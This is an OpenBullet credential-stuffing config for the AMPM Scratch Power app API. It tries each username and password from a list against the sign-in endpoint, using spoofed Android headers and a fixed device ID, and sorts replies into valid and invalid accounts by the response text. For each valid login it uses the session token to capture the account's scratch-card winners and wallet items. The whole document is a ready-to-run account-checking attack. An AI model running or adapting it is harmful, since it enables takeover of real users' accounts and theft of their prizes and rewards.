[SETTINGS]
{
  "Name": "AMPM Scratch Power",
  "SuggestedBots": 1,
  "LastModified": "2018-07-11T18:58:20.0325134+00:00",
  "AdditionalInfo": "",
  "Author": "Black Panther",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
FUNCTION Constant "6c087d28c453645c" -> VAR "ID" 
REQUEST POST "http://api.ampmscratchpower.com/v1/users/sign_in" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)" 
  HEADER "Pragma: no-cache" 
  HEADER "device-vendor-id: <ID>" 
  HEADER "device-platform: android" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "User not found" 
  KEYCHAIN Success OR 
    KEY "{\"auth_token\":\"" 
PARSE "<SOURCE>" LR "{\"auth_token\":\"" "\"" Recursive=FALSE -> VAR "AUTH" "" "" 
REQUEST GET "http://api.ampmscratchpower.com/v1/scratchers" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "user-auth-token: <AUTH>" 
  HEADER "device-platform: android" 
  HEADER "device-vendor-id: <ID>" 
#count FUNCTION CountOccurrences "is_winner" "<winners>" -> VAR "COUNT" 
IF "<COUNT>" EqualTo "0"
JUMP #ToS
ENDIF

PARSE "<SOURCE>" LR "[{\"" "}]" Recursive=FALSE -> VAR "winners" "" "" 
#prizes_=_loser FUNCTION CountOccurrences "is_winner\":false" "<winners>" -> VAR "LOSERS" 
#prizes_=_winner FUNCTION CountOccurrences "is_winner\":true" "<winners>" -> VAR "WINNERS" 
FUNCTION Constant "<winners> | <COUNT> Total Scratchies | <LOSERS> Total Losers | <WINNERS> Total Winners" -> CAP "" 
#ToS FUNCTION Constant "ToS" -> VAR "ToS" 
REQUEST GET "http://api.ampmscratchpower.com/v1/wallet_items" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "user-auth-token: <AUTH>" 
  HEADER "device-platform: android" 
  HEADER "device-vendor-id: <ID>" 
PARSE "<SOURCE>" LR "[" "]" Recursive=FALSE -> CAP "wallet" "" "" 
